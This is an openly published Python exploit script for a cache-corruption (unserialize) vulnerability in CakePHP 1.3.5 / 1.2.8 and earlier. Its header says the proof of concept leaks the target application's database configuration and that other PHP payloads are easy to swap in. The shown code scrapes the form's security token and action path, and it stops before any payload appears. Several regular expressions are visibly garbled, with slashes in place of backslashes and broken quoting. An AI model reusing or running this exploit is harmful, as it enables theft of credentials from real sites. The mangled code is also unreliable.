CakePHP <= 1.3.5 / 1.2.8 Cache Corruption Exploit

#!/usr/bin/python # # burnedCake.py - CakePHP <= 1.3.5 / 1.2.8 Cache Corruption Exploit # written by [email protected] # # This code exploits a unserialize() vulnerability in the CakePHP security # component. See http://malloc.im/CakePHP-unserialize.txt for a detailed # analysis of the vulnerability. # # The exploit should work against every CakePHP based Application, that # uses POST forms with security tokens and hasn't changed the Cache  # configuration (file-system caching is standard). Exploiting # other caching configurations is possible but not as elegant. # # This POC will output the database config file of the running CakePHP Application, # other payloads are easily possibe with a changed PHP Code.  from optparse import OptionParser from urlparse import urlparse,urljoin import urllib2 import urllib import re  def request(url,data="",headers={},debug=0):     if (data==""):         request = urllib2.Request(url=url,headers=headers)     else:         request = urllib2.Request(url=url,headers=headers,data=data)              debug_handler = urllib2.HTTPHandler(debuglevel = debug)     opener = urllib2.build_opener(debug_handler)     response=opener.open(request)     return response   if __name__=="__main__":      parser = OptionParser(usage="usage: %prog [options] url")      parser.add_option("-p", "--post", dest="post",                       help="additional post content as urlencoded string")     parser.add_option("-v", action="store_true", dest="verbose",                        help="verbose mode")      (options, args) = parser.parse_args()     if len(args)!=1:         parser.error("wrong number of arguments")     if options.verbose:         debug=1     else:          debug=0     if not options.post:         options.post=""     url=urlparse(args[0])     html=request(url.geturl(),debug=debug ).read()      try:         key=re.search("data/[_Token/]/[key/]/" value=/"(.*?)/"",html).group(1)         path=re.search('method="post" action="(.*?)"',html).group(1)         fields=re.search('data/[_Token/]/[fields/]" value="([0-9a-f]{32}).*?"',html).group(1)     except:         print "[x] Regex failed! :("         exit()